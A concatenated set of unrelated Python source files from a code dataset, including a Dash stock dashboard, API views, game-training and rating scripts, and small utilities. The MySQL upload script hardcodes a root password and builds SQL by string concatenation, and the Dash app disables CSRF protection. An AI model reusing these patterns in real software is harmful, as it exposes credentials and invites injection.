\"static/img/bear.png\"\r\n\r\nstart_date = datetime.now() - timedelta(days=365)\r\nend_date = datetime.now()\r\nstocks = combine_stock_list()\r\n\r\nnavbar = dbc.Navbar(\r\n [\r\n html.A(\r\n dbc.Row(\r\n [\r\n dbc.Col(html.Img(src=BULL_LOGO, height=\"40px\")),\r\n dbc.Col(dbc.NavbarBrand(\"VALUE STOCK ANALYSIS\", className=\"ml-2\")),\r\n dbc.Col(html.Img(src=BEAR_LOGO, height=\"40px\")),\r\n ],\r\n align=\"center\",\r\n no_gutters=True,\r\n ),\r\n href=\"#\",\r\n ),\r\n dbc.NavbarToggler(id=\"navbar-toggler\"),\r\n ],\r\n color=\"dark\",\r\n dark=True,\r\n)\r\n\r\nbody = dbc.Container(\r\n [\r\n dbc.Row(\r\n [\r\n dbc.Col(\r\n [\r\n html.H5('Choose a Stock'),\r\n dcc.Dropdown(\r\n id='stock-list',\r\n options= stocks,\r\n value='GOOG'\r\n ),\r\n html.Br(),\r\n html.H5('Select a Date Range'),\r\n dcc.DatePickerRange(\r\n id='date-picker-range',\r\n start_date=datetime(start_date.year,start_date.month,start_date.day),\r\n end_date=datetime(end_date.year,end_date.month,end_date.day),\r\n calendar_orientation='vertical',\r\n ),\r\n dcc.Graph(id='stock-graph'),\r\n \r\n html.Div(id='financial-reports'),\r\n html.H5('Stock Evaluation'),\r\n html.Div(id='stock-evaluation'),\r\n html.Br(),\r\n \r\n html.H5('Future/Current Value and Recommendation'),\r\n html.Div(id='future-value'),\r\n ]\r\n ),\r\n ]\r\n )\r\n ],\r\n className=\"mt-4\",\r\n)\r\n\r\napp = dash.Dash(\r\n __name__, \r\n external_stylesheets=[dbc.themes.BOOTSTRAP],\r\n static_folder='static',\r\n csrf_protect=False\r\n )\r\n\r\nserver = app.server\r\n\r\napp.title = 'Value Stock Analysis'\r\napp.layout = html.Div([navbar, body])\r\n\r\n@app.callback(Output('stock-graph', 'figure'), \r\n [\r\n Input('stock-list', 'value'), \r\n Input('date-picker-range', 'start_date'), \r\n Input('date-picker-range', 'end_date')\r\n ])\r\n\r\ndef update_graph(symbol, start_date, end_date):\r\n stock_prices = web.DataReader(symbol, data_source='yahoo', start=start_date, end=end_date)\r\n\r\n adj_close = go.Scatter(\r\n x = stock_prices.index,\r\n y = stock_prices['Adj Close'],\r\n name = 'Adj Close'\r\n )\r\n exp_20_days = go.Scatter(\r\n x = stock_prices.index,\r\n y = stock_prices['Adj Close'].ewm(span=20, adjust=False).mean(),\r\n name = '20 Days EMA'\r\n )\r\n exp_50_days = go.Scatter(\r\n x = stock_prices.index,\r\n y = stock_prices['Adj Close'].ewm(span=50, adjust=False).mean(),\r\n name = '50 Days EMA'\r\n )\r\n \r\n\r\n data = [adj_close, exp_20_days, exp_50_days]\r\n \r\n layout = go.Layout(\r\n yaxis=dict(\r\n title='Adj Close'\r\n ),\r\n )\r\n return{\r\n 'data': data,\r\n 'layout': layout\r\n }\r\n\r\n@app.callback(Output('financial-reports', 'children'), [Input('stock-list', 'value')])\r\ndef update_table(symbol):\r\n stock_info.get_stock_info(symbol)\r\n df_financial_reports = stock_info.combine_financial_reports()\r\n df_financial_reports = df_financial_reports.loc[:, ~df_financial_reports.columns.str.contains('^Unnamed')]\r\n return dbc.Table.from_dataframe(df_financial_reports, striped=True, bordered=True, hover=False, index=True)\r\n\r\n@app.callback(Output('stock-evaluation', 'children'), [Input('financial-reports', 'children')])\r\ndef update_table(symbol):\r\n evaluations = get_stock_evaluation()\r\n\r\n if(any(evaluations)): # if any reason exists\r\n return html.Span(\r\n html.H5(\r\n [\r\n dbc.Badge(evaluation, pill=True, color=\"danger\", className=\"mr-1\") for evaluation in evaluations\r\n ]\r\n )\r\n )\r\n else:\r\n return html.H5(dbc.Badge(\"GOOD\", pill=True, color=\"success\", 
className=\"mr-1\"))\r\n\r\n@app.callback(Output('future-value', 'children'), [Input('financial-reports', 'children')])\r\ndef update_table(symbol):\r\n future_value = get_future_value()\r\n return dbc.Table.from_dataframe(future_value, striped=True, bordered=True, hover=False, index=True)\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)\r\n","sub_path":"dash_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"645368945","text":"# -*- coding: utf-8 -*-\nfrom openregistry.lots.core.utils import (\n json_view,\n context_unpack,\n APIResource,\n)\nfrom openregistry.lots.core.utils import (\n oplotsresource, apply_patch, save_lot\n)\nfrom openregistry.lots.loki.utils import (\n process_caravan_contract_report_result\n)\nfrom openregistry.lots.loki.validation import (\n validate_contracts_data,\n)\npatch_validators = (\n validate_contracts_data\n)\n\n\n@oplotsresource(name='loki:Lot Contracts',\n collection_path='/lots/{lot_id}/contracts',\n path='/lots/{lot_id}/contracts/{contract_id}',\n _internal_type='loki',\n description=\"Lot related contracts\")\nclass LotContractResource(APIResource):\n\n @json_view(permission='view_lot')\n def collection_get(self):\n \"\"\"Lot Contract List\"\"\"\n collection_data = [i.serialize(\"view\") for i in self.context.contracts]\n return {'data': collection_data}\n\n @json_view(permission='view_lot')\n def get(self):\n \"\"\"Lot Contract Read\"\"\"\n contract = self.request.validated['contract']\n return {'data': contract.serialize(\"view\")}\n\n @json_view(content_type=\"application/json\", permission='upload_lot_contracts', validators=patch_validators)\n def patch(self):\n \"\"\"Lot Contract Update\"\"\"\n apply_patch(self.request, save=False, src=self.request.context.serialize())\n if self.request.authenticated_role == 'caravan':\n process_caravan_contract_report_result(self.request)\n if save_lot(self.request):\n self.LOGGER.info(\n 'Updated lot contract {}'.format(self.request.context.id),\n extra=context_unpack(self.request, {'MESSAGE_ID': 'lot_contract_patch'})\n )\n return {'data': self.request.context.serialize(\"view\")}\n","sub_path":"openregistry/lots/loki/views/lot_contracts.py","file_name":"lot_contracts.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"198769735","text":"def word_count(s):\n word_count = {}\n for word in s:\n word_count.setdefault(word, 0)\n word_count[word] += 1\n return word_count\n\ninput_text = open('read_files/moby_clean.txt', 'r')\ns = input_text.read().split()\ninput_text.close()\n\nlst_count = list(word_count(s).items())\nlst_count.sort(key=lambda i: i[1])\n\nprint('most popular:')\nfor i in range(len(lst_count) - 1, len(lst_count) - 6, -1):\n print(lst_count[i])\n\nprint('\\nleast popular:')\nfor i in range(0, 5):\n print(lst_count[i])\n","sub_path":"lesson_10/moby_stat.py","file_name":"moby_stat.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"365540864","text":"import pokedex_API\n\ndef output(search_result: dict) -> None:\n hp = attack = defense = speed = None\n type = ''\n \n list_of_stats = search_result['stats'] #stores a list of dictionaries containing stats\n list_of_types = search_result['types'] #stores a list of dictionaries containing types\n \n for stat in list_of_stats: 
# stat is an individual dictionary\n if stat['stat']['name'] == 'hp':\n hp = str(stat['base_stat'])\n elif stat['stat']['name'] == 'attack':\n attack = str(stat['base_stat'])\n elif stat['stat']['name'] == 'defense':\n defense = str(stat['base_stat'])\n elif stat['stat']['name'] == 'speed':\n speed = str(stat['base_stat'])\n \n for t in list_of_types:\n type += t['type']['name'] + ', '\n \n print('Pokemon: ' + search_result['name'])\n print('Type: ' + type[:-2])\n print('Weight: ' + str(search_result['weight']) + ' kg') \n print('HP: ' + hp) \n print('Attack: ' + attack)\n print('Defense: ' + defense)\n print('Speed: ' + speed + '\\n')\n\n \ndef input_number() -> int:\n number = int(input(\"Enter Dex Number: \"))\n return number\n\ndef final() -> None:\n while True:\n result = pokedex_API.get_result(pokedex_API.build_v2_url(input_number()))\n output(result)\n\nif __name__ == '__main__':\n final()\n","sub_path":"pokedex_UI.py","file_name":"pokedex_UI.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"514369127","text":"import os\nimport MySQLdb\nimport time\nfrom warnings import filterwarnings\n\n# Open database connection\ndb = MySQLdb.connect(\"localhost\",\"root\",\"4oq5ue2hw\",\"db\" )\ncursor = db.cursor()\nfilterwarnings('ignore', category = db.Warning)\n\n# declare variables\nrelative_path = \"/Users/andy/Desktop/andar/andar\"\n\ndef csvList():\n path = relative_path + \"/\"\n array = []\n for file in os.listdir(path):\n if file.endswith(\".csv\"):\n # print(file.replace(\"_spider.py\", \"\"))\n array.append(file.replace(\".csv\",\"\"))\n return array\n\ndef insert_data(csv):\n sql = \"LOAD DATA LOCAL INFILE '\" + relative_path + \"/\" + csv + \".csv' INTO TABLE \" + csv + \" FIELDS TERMINATED BY ',' IGNORE 1 ROWS;\"\n cursor.execute(sql)\n print(\"Data uploaded in SQL for \" + csv)\n #commit the data\n db.commit()\n\n#get list of csv\ncsv_list = csvList()\n\n# upload to SQL (NOT WORKING/ SKIPPING THIS FOR LOOP)!!!!\nfor csv in csv_list:\n insert_data(csv)\n","sub_path":"scraper3/modules/upload_all.py","file_name":"upload_all.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"631962812","text":"import collections\nimport random\nimport pickle\nimport numpy as np\nimport time\nfrom copy import copy\n\nfrom filelock import FileLock\n\n\n\nfrom xo_game.techniques import monte_carlo_tree_play\nfrom xo_game.techniques import monte_carlo_tree_search_uct_with_value\nfrom xo_game.games.tic_tac_toe_x import TicTacToeXGameSpec\nfrom xo_game.techniques import min_max_alpha_beta\n\nstate_results = collections.defaultdict(float)\nstate_samples = collections.defaultdict(float)\nstate_values = collections.defaultdict(float)\n\nstate_results_old = collections.defaultdict(float)\nstate_samples_old = collections.defaultdict(float)\nstate_values_old = collections.defaultdict(float)\n\nlock = FileLock(\"mont_state_results.lock\")\n\nwith lock:\n with open('mont_state_results.p', mode='rb') as f:\n state_results = pickle.load(f)\n with open('mont_state_samples.p', mode='rb') as f:\n state_samples = pickle.load(f)\n with open('mont_state_values.p', mode='rb') as f:\n state_values = pickle.load(f)\n\nstate_results_old = copy(state_results)\nstate_samples_old = copy(state_samples)\nstate_values_old = copy(state_values)\n\n# state_samples2 = dict(state_samples)\n# for x in state_samples2:\n# if state_samples[x] == 
0:\n# del state_samples[x]\n\n\n# model = gen_model()\n# model.load_weights(filepath='value_network_keras')\n\ngame_spec = TicTacToeXGameSpec(winning_length=5, board_size=10)\n\n\ndef make_move_min_max(board_state, side):\n start_time = time.time()\n move = min_max_alpha_beta(game_spec, board_state, side, 2)[1]\n end_time = time.time()\n # print(move, side, end_time - start_time, 'minimax')\n return move\n\n\ndef make_move_min_max_train(board_state, side):\n move = min_max_alpha_beta(game_spec, board_state, side, 1)[1]\n return move\n\n\n# def value_func(board_state):\n# result = model.predict(np.array(board_state).reshape(1, 10, 10, 1))\n#\n# return result\n\n\ndef make_move_network_train(board_state, side):\n start_time = time.time()\n avg_result, move = monte_carlo_tree_search_uct_with_value(game_spec, board_state, side, 0.7,\n state_results, state_samples,\n make_move_min_max_train)\n end_time = time.time()\n # print(move, side, end_time - start_time, 'montecarlo', avg_result)\n return move\n\n\ndef make_move_network(board_state, side):\n start_time = time.time()\n move = monte_carlo_tree_play(game_spec, board_state, side,\n state_results, state_samples, make_move_min_max_train)\n end_time = time.time()\n # print(move, side, end_time - start_time, 'montecarlo')\n return move\n\n\nresults = []\nnum = 0\nwhile True:\n # randomize if going first or second\n if bool(random.random() > 0.5):\n reward = -game_spec.play_game(make_move_min_max, make_move_network_train)\n else:\n reward = game_spec.play_game(make_move_network_train, make_move_min_max)\n\n results.append(1 if reward > 0 else 0)\n print(reward)\n num += 1\n if num % 10 == 0:\n print(np.sum(np.array(results)) / num, num)\n with lock:\n with open('mont_state_results.p', mode='rb') as f:\n state_results_copy = pickle.load(f)\n with open('mont_state_samples.p', mode='rb') as f:\n state_samples_copy = pickle.load(f)\n with open('mont_state_values.p', mode='rb') as f:\n state_values_copy = pickle.load(f)\n\n\n def dsum(dict1, dict2, dict3):\n ret = collections.defaultdict(float)\n\n for k, v in dict2.items():\n ret[k] += dict1[k] + dict2[k] - dict3[k]\n if dict2[k] != 0 and ret[k] == 0:\n ret[k] = dict2[k]\n return ret\n\n\n state_results = dsum(state_results_copy, state_results, state_results_old)\n state_samples = dsum(state_samples_copy, state_samples, state_samples_old)\n state_values = {**state_values, **state_values_copy}\n\n with lock:\n with open('mont_state_results.p', mode='wb') as f:\n pickle.dump(state_results, f)\n with open('mont_state_values.p', mode='wb') as f:\n pickle.dump(state_values, f)\n with open('mont_state_samples.p', mode='wb') as f:\n pickle.dump(state_samples, f)\n\n with open('mont_state_results_copy.p', mode='wb') as f:\n pickle.dump(state_results, f)\n with open('mont_state_values_copy.p', mode='wb') as f:\n pickle.dump(state_values, f)\n with open('mont_state_samples_copy.p', mode='wb') as f:\n pickle.dump(state_samples, f)\n\n state_results_old = copy(state_results)\n state_samples_old = copy(state_samples)\n state_values_old = copy(state_values)\n","sub_path":"xo_game/train_monte_carlo.py","file_name":"train_monte_carlo.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"525125574","text":"#!/usr/bin/python\n\n'''\nThis script will recompute the ratings for a given period.\n\n./period.py <period_id>\n\nThe script will yield an error message if there are untreated matches from previous periods, or if 
previous\nperiods are marked as not computed.\n\nIf you recompute all the ratings, consider commenting the last line (call to domination.py), see the comment\nfor more details.\n'''\n\nimport sys, os\nfrom numpy import *\n\n# This is required for Django imports to work correctly\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"aligulac.settings\")\n\nfrom django.db import connection, transaction\nfrom django.db.models import Q, F\nfrom ratings.models import Period, Player, Rating, Match\nfrom ratings.tools import filter_active_ratings, start_rating\nfrom aligulac.parameters import RATINGS_INIT_DEV, RATINGS_MIN_DEV, RATINGS_DEV_DECAY,\\\n OFFLINE_WEIGHT, KR_START, KR_END, KR_RATE\n\nfrom rating import update, performance\nfrom ratings.tools import cdf\n\n# Parameters for rating computation\nRACES = 'PTZ'\nEXRACES = 'M' + RACES # 'M' is 'MEAN'\n\nKR_RATING = start_rating('KR', int(sys.argv[1]));\n\n# This is a meta class holding information about rating computation\nclass CPlayer:\n def __init__(self):\n self.prev_rating = dict() # A dict mapping EXRACES to ratings\n self.prev_dev = dict() # A dict mapping EXRACES to RDs\n self.oppc = [] # Opponent categories\n self.oppr = [] # Opponent ratings\n self.oppd = [] # Opponent RDs\n self.W = [] # Number of wins\n self.L = [] # Number of losses\n self.player = None # Django Player object\n self.prev_rating_obj = None # Django previous Rating object\n\n # Returns previous ratings in an array\n def get_rating_array(self):\n ret = []\n for r in EXRACES:\n ret.append(self.prev_rating[r])\n return array(ret)\n\n # Returns previous RDs in an array\n def get_dev_array(self):\n ret = []\n for r in EXRACES:\n ret.append(self.prev_dev[r])\n return array(ret)\n\ndef get_new_players(cplayers, period, prev):\n \"\"\"Collects information about all new players, and adds them to the cplayers dict if not already there.\"\"\"\n\n players = Player.objects.filter(Q(match_pla__period=period) | Q(match_plb__period=period))\n if prev is not None:\n players = players.exclude(rating__period=prev)\n\n for player in players.distinct():\n cp = CPlayer()\n cp.player = player\n cp.prev_rating_obj = None\n\n # Fill in the previous rating information\n for r in EXRACES:\n cp.prev_rating[r] = 0.0\n cp.prev_dev[r] = RATINGS_INIT_DEV\n\n if player.country == 'KR':\n cp.prev_rating['M'] = KR_RATING\n\n # Add to the dict\n cplayers[player.id] = cp\n\ndef get_existing_players(cplayers, prev):\n \"\"\"Collects information about all players already rated, and adds them to the cplayers dict.\"\"\"\n\n ratings = Rating.objects.filter(period=prev).select_related('player')\n for rating in ratings:\n cp = CPlayer()\n cp.player = rating.player\n cp.prev_rating_obj = rating\n\n # Fill in the previous rating information\n for r in RACES:\n cp.prev_rating[r] = rating.get_rating(r)\n cp.prev_dev[r] = rating.get_dev(r)\n cp.prev_rating['M'] = rating.get_rating()\n cp.prev_dev['M'] = rating.get_dev()\n\n # Add to the dict\n cplayers[rating.player.id] = cp\n\ndef decay_dev(cp):\n \"\"\"Decays the RD of a player.\"\"\"\n for r in EXRACES:\n cp.prev_dev[r] = min(sqrt(cp.prev_dev[r]**2 + RATINGS_DEV_DECAY**2), RATINGS_INIT_DEV)\n\ndef get_matches(cplayers, period):\n \"\"\"\n Collects all results during a period and adds them to the cplayer objects.\n Returns the number of games played.\n \"\"\"\n\n # Useful meta function to add a match to a cplayer object\n def add(cp_my, cp_op, rc_my, rc_op, sc_my, sc_op, weight=1.0):\n cp_my.oppc.append(RACES.index(rc_op))\n 
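# Editor's note: the appends on either side of this point fold the opponent's\n# mean ('M') and race-specific components into one effective rating, and combine\n# the two rating deviations in quadrature: variances of independent estimates\n# add, so standard deviations combine as a root sum of squares. A minimal,\n# hedged sketch of that combination (illustrative names, not part of period.py):\n#\n# from math import sqrt\n#\n# def combined_rd(dev_mean, dev_race):\n#     return sqrt(dev_mean ** 2 + dev_race ** 2)  # sqrt(var_mean + var_race)\n#\n# assert abs(combined_rd(3.0, 4.0) - 5.0) < 1e-9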
cp_my.oppr.append(cp_op.prev_rating['M'] + cp_op.prev_rating[rc_my])\n cp_my.oppd.append(sqrt(cp_op.prev_dev['M']**2 + cp_op.prev_dev[rc_my]**2))\n cp_my.W.append(weight * sc_my)\n cp_my.L.append(weight * sc_op)\n\n # Counter for number of games\n ngames = 0\n\n # Loop over all matches\n matches = Match.objects.filter(period=period).select_related('pla', 'plb')\n for m in matches:\n # Get cplayer objects\n cpa = cplayers[m.pla.id]\n cpb = cplayers[m.plb.id]\n\n # Set the played races for each player. For the vast majority of matches this should be a single item\n # list per player. When a player plays as random, or an unrecognized race, it will be treated as even\n # weight over all the three races\n rcas = [m.rca] if m.rca in RACES else RACES\n rcbs = [m.rcb] if m.rcb in RACES else RACES\n weight = float(1)/len(rcas)/len(rcbs)\n\n if m.offline:\n weight *= OFFLINE_WEIGHT\n\n # For each race combination, add information to the cplayer objects\n for ra in rcas:\n for rb in rcbs:\n add(cpa, cpb, ra, rb, m.sca, m.scb, weight)\n add(cpb, cpa, rb, ra, m.scb, m.sca, weight)\n\n # Count games\n ngames += m.sca + m.scb\n\n return ngames\n\ndef array_to_dict(ar):\n \"\"\"Transforms a rating/RD dict to an array.\"\"\"\n d = dict()\n d['M'] = ar[0]\n d['P'] = ar[1]\n d['T'] = ar[2]\n d['Z'] = ar[3]\n return d\n\n# Main code for this script\nif __name__ == '__main__':\n # Get period\n try:\n period = Period.objects.get(id=int(sys.argv[1]))\n except:\n print('No such period.')\n sys.exit(1)\n\n print('Period {0}: from {1} to {2}'.format(period.id, period.start, period.end))\n\n # Check that all previous periods are computed\n prev = Period.objects.filter(id__lt=period.id, computed=False)\n if prev.exists():\n print('Previous period #%i not computed. Aborting.' % prev[0].id)\n sys.exit(1)\n\n # Find the previous period if it exists\n try:\n prev = Period.objects.get(id=period.id-1)\n except:\n prev = None\n\n # Get all cplayer objects\n cplayers = dict()\n if prev:\n get_existing_players(cplayers, prev)\n get_new_players(cplayers, period, prev)\n\n # Update RDs since a period has passed\n for cp in cplayers.values():\n decay_dev(cp)\n\n # Collect match information\n num_games = get_matches(cplayers, period)\n print('Initialized: {0} players and {1} games. 
Updating...'.format(len(cplayers), num_games))\n\n # Update ratings\n num_retplayers = 0\n num_newplayers = 0\n for cp in cplayers.values():\n (newr, newd) = update(cp.get_rating_array(), cp.get_dev_array(),\n array(cp.oppr), array(cp.oppd), array(cp.oppc), array(cp.W), array(cp.L),\n cp.player.tag, False)\n\n cp.new_rating = array_to_dict(newr)\n cp.new_dev = array_to_dict(newd)\n\n perf = performance(array(cp.oppr), array(cp.oppd), array(cp.oppc), array(cp.W), array(cp.L))\n\n cp.comp_rat = array_to_dict(perf)\n\n # Count player as returning or new\n if len(cp.W) > 0 and cp.prev_rating_obj:\n num_retplayers += 1\n elif len(cp.W) > 0:\n num_newplayers += 1\n #sys.exit(0)\n\n # Get a table of existing rating objects\n existing = set()\n for i in Rating.objects.filter(period=period).values('player_id'):\n existing.add(i['player_id'])\n\n # Write ratings to database\n print('Saving ratings and bookkeping...')\n\n update_qvals, insert_qvals = [], []\n for cp in cplayers.values():\n tup = (cp.new_rating['M'], cp.new_rating['P'], cp.new_rating['T'], cp.new_rating['Z'],\n cp.new_dev['M'], cp.new_dev['P'], cp.new_dev['T'], cp.new_dev['Z'],\n cp.comp_rat['M'], cp.comp_rat['P'], cp.comp_rat['T'], cp.comp_rat['Z'])\n\n if cp.player.id not in existing:\n to = insert_qvals\n tup += tup[0:8]\n else:\n to = update_qvals\n\n if len(cp.W) == 0 and cp.prev_rating_obj is not None:\n tup += (cp.prev_rating_obj.decay+1,)\n else:\n tup += (0,)\n\n tup += (cp.player.id, period.id)\n to.append(tup)\n\n cursor = connection.cursor()\n cursor.executemany('''UPDATE ratings_rating \n SET rating=%s, rating_vp=%s, rating_vt=%s, rating_vz=%s,\n dev=%s, dev_vp=%s, dev_vt=%s, dev_vz=%s,\n comp_rat=%s, comp_rat_vp=%s, comp_rat_vt=%s, comp_rat_vz=%s,\n decay=%s\n WHERE player_id=%s AND period_id=%s''', update_qvals)\n cursor.executemany('''INSERT INTO ratings_rating \n (rating, rating_vp, rating_vt, rating_vz,\n dev, dev_vp, dev_vt, dev_vz,\n comp_rat, comp_rat_vp, comp_rat_vt, comp_rat_vz,\n bf_rating, bf_rating_vp, bf_rating_vt, bf_rating_vz,\n bf_dev, bf_dev_vp, bf_dev_vt, bf_dev_vz,\n decay, player_id, period_id)\n VALUES\n (%s, %s, %s, %s,\n %s, %s, %s, %s,\n %s, %s, %s, %s,\n %s, %s, %s, %s,\n %s, %s, %s, %s,\n %s, %s, %s)''', insert_qvals)\n\n # Set all matches to treated\n Match.objects.filter(period=period).update(treated=True)\n\n # Compute OP/UP race\n def mean(a):\n return sum([f.rating for f in a])/len(a)\n rp = mean(Rating.objects.filter(period=period, player__race='P', decay__lt=4).order_by('-rating')[:5])\n rt = mean(Rating.objects.filter(period=period, player__race='T', decay__lt=4).order_by('-rating')[:5])\n rz = mean(Rating.objects.filter(period=period, player__race='Z', decay__lt=4).order_by('-rating')[:5])\n sp = cdf(rp-rt) + cdf(rp-rz)\n st = cdf(rt-rp) + cdf(rt-rz)\n sz = cdf(rz-rp) + cdf(rz-rt)\n period.dom_p = sp\n period.dom_t = st\n period.dom_z = sz\n\n # Write some period statistics\n period.num_retplayers = num_retplayers\n period.num_newplayers = num_newplayers\n period.num_games = num_games\n period.computed = True\n period.needs_recompute = False\n period.save()\n\n # Write ranks\n ratings = list(filter_active_ratings(Rating.objects.filter(period=period)))\n for index, rating in enumerate(sorted(ratings, key=lambda r: r.rating, reverse=True)):\n rating.position = index + 1\n for index, rating in enumerate(sorted(ratings, key=lambda r: r.rating + r.rating_vp, reverse=True)):\n rating.position_vp = index + 1\n for index, rating in enumerate(sorted(ratings, key=lambda r: r.rating + r.rating_vt, 
reverse=True)):\n rating.position_vt = index + 1\n for index, rating in enumerate(sorted(ratings, key=lambda r: r.rating + r.rating_vz, reverse=True)):\n rating.position_vz = index + 1\n for rating in ratings:\n rating.save()\n\n # Recompute the hall of fame\n # NOTE: If you compute several periods after one another, it might be wise to comment this and run it only\n # after the last rating computation, as it takes time to run and adds up quickly.\n # os.system('./domination.py')\n","sub_path":"aligulac/period.py","file_name":"period.py","file_ext":"py","file_size_in_byte":11600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"414164523","text":"# rewind-client talks to rewind, an event store server.\n#\n# Copyright (C) 2012 Jens Rantil\n#\n# This program is distributed under the MIT License. See the file LICENSE.txt\n# for details.\n\n\"\"\"Test code format and coding standards.\"\"\"\nfrom __future__ import print_function\nimport os\nimport pep8\nimport pep257\nimport unittest\n\n\nclass TestCodeFormat(unittest.TestCase):\n\n \"\"\"Tests that asserts code quality.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Create a list of all Python files in Rewind.\"\"\"\n cls._pyfiles = cls._get_all_pyfiles()\n\n @staticmethod\n def _get_all_pyfiles():\n \"\"\"Return a list of all Python files in Rewind.\"\"\"\n while not os.getcwd().endswith('rewind'):\n os.chdir('..')\n os.chdir('..')\n\n pyfiles = []\n for dirpath, _, filenames in os.walk('rewind'):\n pyfiles.extend([os.path.join(dirpath, filename)\n for filename in filenames\n if filename.endswith('.py')])\n assert len(pyfiles) > 0, os.getcwd()\n return pyfiles\n\n def testPep8Conformance(self):\n \"\"\"Test that we conform to PEP8.\"\"\"\n pep8style = pep8.StyleGuide()\n result = pep8style.check_files(self._pyfiles)\n\n # Currently two E301:s fail. 
I find those checks to be\n # buggy and will report them to the pep8 project on github.\n self.assertEqual(result.total_errors, 0,\n \"Found code syntax errors (and warnings).\")\n\n def testPep257Conformance(self):\n \"\"\"Test that we conform to PEP257.\"\"\"\n errors = pep257.check_files(self._pyfiles)\n if errors:\n print(\"There were errors:\")\n for error in errors:\n print(error)\n self.assertEqual(len(errors), 0)\n\n def testLogbookIsGone(self):\n \"\"\"Make sure we no longer use the name \"logbook\".\n\n \"logbook\" was the early working project name that later became\n \"rewind\".\n\n \"\"\"\n errmsg = \"'{0}' contained 'logbook' although it shouldn't\"\n for pyfile in self._pyfiles:\n if pyfile.endswith('/test_code.py'):\n continue\n with open(pyfile) as f:\n pythoncode = f.read()\n assert \"logbook\" not in pythoncode.lower(), errmsg.format(pyfile)\n\n def test_license_header(self):\n \"\"\"Test that all source files contain the license header.\"\"\"\n needle = \"MIT License\"\n for pyfile in self._pyfiles:\n with open(pyfile) as f:\n haystack = f.read()\n msg = \"{0} did not contain license header\"\n self.assertTrue(needle in haystack, msg.format(pyfile))\n","sub_path":"rewind/client/test/test_code.py","file_name":"test_code.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"70534619","text":"from __future__ import unicode_literals\nfrom django.db import models\n\n\nclass CourseManager(models.Manager):\n def course_validator(self, postData):\n errors = {}\n # name length check\n if len(postData['name']) < 5:\n errors['name'] = 'name has to be more than 5 characters'\n if len(postData['desc']) < 15:\n errors['desc'] = 'description has to be more than 15 characters'\n return errors\n\n\nclass Course(models.Model):\n name = models.CharField(max_length=255)\n desc = models.TextField()\n created_at = models.DateTimeField(auto_now_add=True)\n objects = CourseManager()\n \n def __repr__(self):\n return \"<Course objects: {}, {}, {}>\".format(self.name, self.desc, self.created_at)\n ","sub_path":"Django/courses/main/apps/courses/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"503641560","text":"import requests\nimport datetime as dt\nfrom src.typeDefs.rawPairAnglesCreationResp import RawPairAnglesCreationResp\n\n\nclass RawPairAnglesCreationHandler():\n rawPairAnglesCreationUrl = ''\n\n def __init__(self, rawPairAnglesCreationUrl):\n self.rawPairAnglesCreationUrl = rawPairAnglesCreationUrl\n\n def createRawPairAngles(self, startDate: dt.datetime, endDate: dt.datetime) -> RawPairAnglesCreationResp:\n \"\"\"Create raw pair angles using the API service\n\n Args:\n startDate (dt.datetime): start date\n endDate (dt.datetime): end date\n\n Returns:\n RawPairAnglesCreationResp: Result of the raw pair angles creation operation\n \"\"\"\n createRawPairAnglesPayload = {\n \"startDate\": dt.datetime.strftime(startDate, '%Y-%m-%d'),\n \"endDate\": dt.datetime.strftime(endDate, '%Y-%m-%d')\n }\n res = requests.post(self.rawPairAnglesCreationUrl,\n json=createRawPairAnglesPayload)\n\n operationResult: RawPairAnglesCreationResp = {\n \"isSuccess\": False,\n 'status': res.status_code,\n 'message': 'Unable to create raw pair angles...'\n }\n\n if res.status_code == requests.codes['ok']:\n resJSON = res.json()\n operationResult['isSuccess'] = True\n operationResult['message'] = 
resJSON['message']\n else:\n operationResult['isSuccess'] = False\n try:\n resJSON = res.json()\n operationResult['message'] = resJSON['message']\n except ValueError:\n operationResult['message'] = res.text\n return operationResult\n","sub_path":"src/services/rawPairAnglesCreationHandler.py","file_name":"rawPairAnglesCreationHandler.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"280912568","text":"import math\nimport csv\nimport os, sys\nimport unittest\n\n\nloci = [\"AMEL\", \"D3S1358\", \"D1S1656\", \"D2S441\", \"D10S1248\",\n \"D13S317\", \"Penta E\", \"D16S539\", \"D18S51\", \"D2S1338\", \"CSF1PO\",\n \"Penta D\", \"TH01\", \"vWA\", \"D21S11\", \"D7S820\", \"D5S818\",\n \"TPOX\", \"DYS391\", \"D8S1179\", \"D12S391\", \"D19S433\", \"FGA\", \"D22S1045\"]\n\nchannel_dictionary = {\n \"Sample Name\": \"\", \"AMEL\": \"Blue\", \"D3S1358\": \"Blue\",\n \"D1S1656\": \"Blue\", \"D2S441\": \"Blue\", \"D10S1248\": \"Blue\",\n \"D13S317\": \"Blue\", \"Penta E\": \"Blue\", \"D16S539\": \"Green\",\n \"D18S51\": \"Green\", \"D2S1338\": \"Green\", \"CSF1PO\": \"Green\",\n \"Penta D\": \"Green\", \"TH01\": \"Yellow\", \"vWA\": \"Yellow\",\n \"D21S11\": \"Yellow\", \"D7S820\": \"Yellow\", \"D5S818\": \"Yellow\",\n \"TPOX\": \"Yellow\", \"DYS391\": \"Yellow\", \"D8S1179\": \"Red\",\n \"D12S391\": \"Red\", \"D19S433\": \"Red\", \"FGA\": \"Red\", 